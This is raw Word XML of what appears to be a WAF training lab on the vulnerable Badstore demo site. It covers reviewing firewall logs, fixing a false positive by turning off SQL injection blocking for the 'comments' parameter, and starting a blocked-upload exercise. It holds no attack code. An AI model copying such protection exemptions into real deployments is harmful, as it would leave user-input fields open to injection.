            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="929889150" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R393a05e4146b4cb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67100" cy="2039144"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="16AED19E" w:rsidRDefault="699639B3" w14:paraId="6629FC62" w14:textId="325E3113">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5C8A6823">
        <w:rPr/>
        <w:t>In WAF-as-a-Service, go to Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="16AED19E" w:rsidRDefault="699639B3" w14:paraId="1596951E" w14:textId="1E8F4EE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5C8A6823">
        <w:rPr/>
        <w:t>Select “Firewall Logs” and view the details attack</w:t>
      </w:r>
      <w:r w:rsidR="4D5538D0">
        <w:rPr/>
        <w:t>.  Make sure you are looking at the right attack by cross-refere</w:t>
      </w:r>
      <w:r w:rsidR="2E0C76DD">
        <w:rPr/>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="4D5538D0">
        <w:rPr/>
        <w:t xml:space="preserve">cing </w:t>
      </w:r>
      <w:r w:rsidR="5C8A6823">
        <w:rPr/>
        <w:t xml:space="preserve">the Incident number </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="5C8A6823">
        <w:rPr/>
        <w:t>( ID</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="5C8A6823">
        <w:rPr/>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="07726288">
        <w:rPr/>
        <w:t xml:space="preserve"> as shown below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="4CBE4E3E" w:rsidRDefault="699639B3" w14:paraId="00A8C91E" w14:textId="00B9EE0F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="5C8A6823">
        <w:drawing>
          <wp:inline wp14:editId="7D6C8D72" wp14:anchorId="763BD181">
            <wp:extent cx="4733926" cy="1862010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="290368865" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R83d0eaea39d648f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33926" cy="1862010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="16AED19E" w:rsidRDefault="699639B3" w14:paraId="4048FE67" w14:textId="2CDDE93E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="553AA16F">
        <w:rPr/>
        <w:t>This convinces your customer that XSS are a problem, and that the WAF can block them.  She is more and more interested in the WAF and the POC is going well</w:t>
      </w:r>
      <w:r w:rsidR="44B465F9">
        <w:rPr/>
        <w:t xml:space="preserve"> and the customer says t</w:t>
      </w:r>
      <w:r w:rsidR="59E01E51">
        <w:rPr/>
        <w:t xml:space="preserve">o check </w:t>
      </w:r>
      <w:r w:rsidR="44B465F9">
        <w:rPr/>
        <w:t xml:space="preserve">back </w:t>
      </w:r>
      <w:r w:rsidR="184FDE28">
        <w:rPr/>
        <w:t xml:space="preserve">with them </w:t>
      </w:r>
      <w:r w:rsidR="44B465F9">
        <w:rPr/>
        <w:t>in a few weeks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="60A83BD3" w:rsidRDefault="60A83BD3" w14:paraId="6A2E4006" w14:textId="62EEDDA8">
      <w:r w:rsidRPr="16AED19E" w:rsidR="60A83BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>A few days later the customer calls you in with some complaints</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="5B2EA725">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidRDefault="32F6121D" w14:paraId="2D4AB755" w14:textId="6120B2A9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="16AED19E" w:rsidRDefault="00D140A2" w14:paraId="5B428DB0" w14:textId="1CAC5A90">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidR="4D543036">
        <w:rPr/>
        <w:t>Customer Complaint</w:t>
      </w:r>
      <w:r w:rsidR="48B1D5E0">
        <w:rPr/>
        <w:t xml:space="preserve"> number 1</w:t>
      </w:r>
      <w:r w:rsidR="4D543036">
        <w:rPr/>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Guestbook</w:t>
      </w:r>
      <w:r w:rsidR="618DCC71">
        <w:rPr/>
        <w:t xml:space="preserve"> Comments Blocked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="32F6121D" w:rsidRDefault="00D140A2" w14:paraId="15E2460F" w14:textId="71496202">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidR="26C43E8D">
        <w:rPr/>
        <w:t xml:space="preserve">A supplier </w:t>
      </w:r>
      <w:r w:rsidR="0B4573EE">
        <w:rPr/>
        <w:t xml:space="preserve">tried to leave </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">the following </w:t>
      </w:r>
      <w:r w:rsidR="52B992B4">
        <w:rPr/>
        <w:t xml:space="preserve">guestbook </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>comment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="16AED19E" w:rsidRDefault="24DC13B2" w14:paraId="61D77DC3" w14:textId="588A8739">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="45F448CD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">I am </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="13299598">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="43324F6D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">official </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="16AED19E" w:rsidR="13299598">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>carpenters</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="16AED19E" w:rsidR="13299598">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> union </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="34C33855">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">product </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="13299598">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="22C2CDFA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="13299598">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> from New York and I love </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="16AED19E" w:rsidR="13299598">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="16AED19E" w:rsidR="13299598">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="4CBE4E3E" w:rsidRDefault="24DC13B2" w14:paraId="51720D3B" w14:textId="42131E1D">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r w:rsidR="24DC13B2">
        <w:rPr/>
        <w:t xml:space="preserve">To the </w:t>
      </w:r>
      <w:r w:rsidR="5715A817">
        <w:rPr/>
        <w:t>supplier’s annoyance, s</w:t>
      </w:r>
      <w:r w:rsidR="24DC13B2">
        <w:rPr/>
        <w:t>he was blocked from posting the comment!</w:t>
      </w:r>
      <w:r w:rsidR="4C72CD17">
        <w:drawing>
          <wp:inline wp14:editId="693F5530" wp14:anchorId="3FF86766">
            <wp:extent cx="2028825" cy="1202989"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1713045915" name="Picture 1713045915" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1713045915"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R6ad1cfb519234e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28825" cy="1202989"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="7F2DB38D" w14:textId="4A794989">
      <w:r>
        <w:t>Can you figure out why and fix it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="2A06F585" w14:textId="78A005F4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="2E116BF6" w14:textId="6E585AE3">
      <w:r w:rsidR="0A9D72E3">
        <w:rPr/>
        <w:t xml:space="preserve">This is known in the business as a false positive.  </w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t>Try it yourself and look at the Firewall Log to see why the request was blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C24694F" w:rsidP="699639B3" w:rsidRDefault="3F6CA8C4" w14:paraId="370FCAF3" w14:textId="6FDF5F7F">
      <w:r w:rsidR="3F6CA8C4">
        <w:drawing>
          <wp:inline wp14:editId="3B486D1B" wp14:anchorId="5666C10B">
            <wp:extent cx="3448051" cy="1464164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="546672717" name="Picture 546672717" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 546672717"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Ra6fc7b7d55b24f9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48051" cy="1464164"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="2CC59FD6" w14:textId="514F5F15">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="6CFF7C79" w14:textId="310EA824">
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t>It looks like we need to stop SQL Injection patterns from being blocked here</w:t>
      </w:r>
      <w:r w:rsidR="428D8395">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve">But obviously, we </w:t>
      </w:r>
      <w:r w:rsidR="00EDBF3A">
        <w:rPr/>
        <w:t>do not</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve"> want to turn SQL Injection protection off for the </w:t>
      </w:r>
      <w:r w:rsidR="3337FCC0">
        <w:rPr/>
        <w:t>entire site</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve">. Which </w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t>component</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve"> could help us?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="6DE7946C" w14:textId="51A8332A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="4E69B8F8" w14:textId="7774E8C7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="003B48A4" w14:paraId="5B1322E3" w14:textId="11A952D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="003B48A4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4C7C2547">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>lication</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="003B48A4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Profiles</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve"> component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="00163BC3" w14:paraId="338D65E6" w14:textId="48E98541">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve">Click Add </w:t>
      </w:r>
      <w:r w:rsidR="653A5B93">
        <w:rPr/>
        <w:t>URL and</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve"> add the URL from the </w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>firewall</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve"> log: “/</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>cgi</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>-bin/</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>badstore.cgi</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="699639B3" w:rsidRDefault="00163BC3" w14:paraId="0330051A" w14:textId="2D5DB61B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You can leave all the settings at their defaults.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="00163BC3" w14:paraId="597BD3DA" w14:textId="16C4EB66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>Hover over the “badstore.cgi” profile, and click the “Add Parameter” icon (looks like a plus with</w:t>
      </w:r>
      <w:r w:rsidR="6A9851C5">
        <w:rPr/>
        <w:t xml:space="preserve"> a gear)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="38DD7BB8" w14:paraId="0670459F" w14:textId="117F8DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="16C9B2F1">
        <w:drawing>
          <wp:inline wp14:editId="5F808463" wp14:anchorId="0EEFCEBE">
            <wp:extent cx="3763516" cy="1787670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="347451931" name="Picture 347451931" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 347451931"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R91c6ba192f81465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63516" cy="1787670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="003B48A4" w:rsidRDefault="00163BC3" w14:paraId="5233F290" w14:textId="31D01C7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve">Enter the parameter which was blocked in the firewall log for the parameter name: “comments”.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="38DD7BB8" w14:paraId="0C9146E0" w14:textId="23B329C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t>For Parameter Class, select Custom</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve">Check all the </w:t>
      </w:r>
      <w:r w:rsidR="7ACBD262">
        <w:rPr/>
        <w:t>boxes but</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve"> uncheck “Block SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="40AF8625">
        <w:drawing>
          <wp:inline wp14:editId="3B1BF256" wp14:anchorId="77AA75F9">
            <wp:extent cx="2947666" cy="2539904"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57603019" name="Picture 57603019" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 57603019"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R411c33eb92a246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47666" cy="2539904"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="38DD7BB8" w14:paraId="58A71415" w14:textId="692D4621">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="03E60FA1">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="26A942C8" w14:paraId="2C6F27E6" w14:textId="40077B57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2810988B">
        <w:rPr/>
        <w:t xml:space="preserve">Go and leave the same comment and </w:t>
      </w:r>
      <w:r w:rsidR="26A942C8">
        <w:rPr/>
        <w:t>see if that fixed it</w:t>
      </w:r>
      <w:r w:rsidR="70E62A4E">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="1473481C" w14:textId="108970B8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="459927AB" w:rsidP="16AED19E" w:rsidRDefault="459927AB" w14:paraId="25672F17" w14:textId="643C03DC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="459927AB">
        <w:rPr/>
        <w:t>Customer Complaint</w:t>
      </w:r>
      <w:r w:rsidR="3C193D27">
        <w:rPr/>
        <w:t xml:space="preserve"> number 2</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>: File Uploads</w:t>
      </w:r>
      <w:r w:rsidR="6BE3E5BF">
        <w:rPr/>
        <w:t xml:space="preserve"> are Failing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="16AED19E" w:rsidRDefault="00FF500C" w14:paraId="630CACC0" w14:textId="61A602D9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="53F689B1">
        <w:rPr/>
        <w:t>A supplier is getting a blocked page when they try to upload their price list.  Let’s recreate the issue</w:t>
      </w:r>
      <w:r w:rsidR="2C3098B3">
        <w:rPr/>
        <w:t xml:space="preserve"> by doing the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="16AED19E" w:rsidRDefault="00FF500C" w14:paraId="1E4EF8AC" w14:textId="3E2B5402">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="13E1A7F0">
        <w:rPr/>
        <w:t xml:space="preserve">Go </w:t>
      </w:r>
      <w:hyperlink r:id="R7ed3d70ed04f4c76">
        <w:r w:rsidRPr="16AED19E" w:rsidR="13E1A7F0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="13E1A7F0">
        <w:rPr/>
        <w:t xml:space="preserve"> and click </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve">“Supplier Login” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="16AED19E" w:rsidRDefault="00FF500C" w14:paraId="5B3131F9" w14:textId="593C306D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7B90486C">
        <w:rPr/>
        <w:t xml:space="preserve">Login as </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="00FF500C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>big@spender.com</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
